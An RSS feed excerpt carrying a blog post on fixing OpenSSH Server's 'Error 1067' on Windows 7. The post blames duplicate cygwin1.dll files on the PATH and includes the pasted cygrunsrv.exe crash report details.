isPermaLink="false">http://www.techsoar.com/?p=43667</guid> <description><![CDATA[After awhile I tried to start OpenSSH service on my laptop and I ended up getting these errors each time I tried to start the service: &#8220;Could not start the OpenSSH Server service on Local Computer. Error 1067: The process terminated unexpectedly.&#8221; I added the details of the errors I experienced. Solution: The main problem [...]]]></description> <content:encoded><![CDATA[<p>After awhile I tried to start OpenSSH service on my laptop and I ended up getting these errors each time I tried to start the service:</p><p>&#8220;<strong>Could not start the OpenSSH Server service on Local Computer. Error 1067: The process terminated unexpectedly.</strong>&#8221;</p><p>I added the details of the errors I experienced.</p><p><strong>Solution</strong>: The main problem to this issue is having multiple cygwin1.dll on your computer and have one of them on the PATH variable.</p><p>1- In order to fix this issue, you first need to find out which folders/applications might have cygwin1.dll file under it.<br
/> 2- Check the PATH variable via right click on My Computer -&gt; Properties -&gt; Advanced System Settings -&gt; Environment Variables<br
/> Under this section, you will find two PATH variables. First one if for the user level (your login) and the second one is for System level (for all users on that machine). You should make sure both PATH variables do not include any folder that you found in the first step.</p><p><strong>Error 1067: The process terminated unexpectedly</strong><br
/> Faulting application name: cygrunsrv.exe, version: 0.0.0.0, time stamp: 0&#215;40826252<br
/> Faulting module name: ntdll.dll, version: 6.1.7600.16559, time stamp: 0x4ba9b21e<br
/> Exception code: 0xc0000005<br
/> Fault offset: 0x00055c11<br
/> Faulting process id: 0xd10<br
/> Faulting application path: C:\Program Files\OpenSSH\bin\cygrunsrv.exe<br
/> Faulting module path: C:\Windows\SYSTEM32\ntdll.dll</p><p><strong>Windows 7 Detailed message:</strong></p><p>Fault bucket , type 0<br
/> Event Name: APPCRASH<br
/> Response: Not available<br
/> Cab Id: 0</p><p>Problem signature:<br
/> P1: cygrunsrv.exe<br
/> P2: 0.0.0.0<br
/> P3: 40826252<br
/> P4: ntdll.dll<br
/> P5: 6.1.7600.16559<br
/> P6: 4ba9b21e<br
/> P7: c0000005<br
/> P8: 00055c11<br
/> P9:<br
/> P10:</p><p>Attached files:<br
/> C:\Windows\Temp\WER4B72.tmp.appcompat.txt<br
/> C:\Windows\Temp\WER4BA1.tmp.WERInternalMetadata.xml<br
/> C:\Windows\Temp\WER4C02.tmp.WERDataCollectionFailure.txt</p><p>These files may be available here:<br
/> C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cygrunsrv.exe_22de35eb95b016db589883555d246a6efe89f540_cab_15c74bfe</p> ]]></content:encoded> <wfw:commentRss>http://www.techsoar.com/openssh-error-1067the-process-terminated-unexpectedly/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
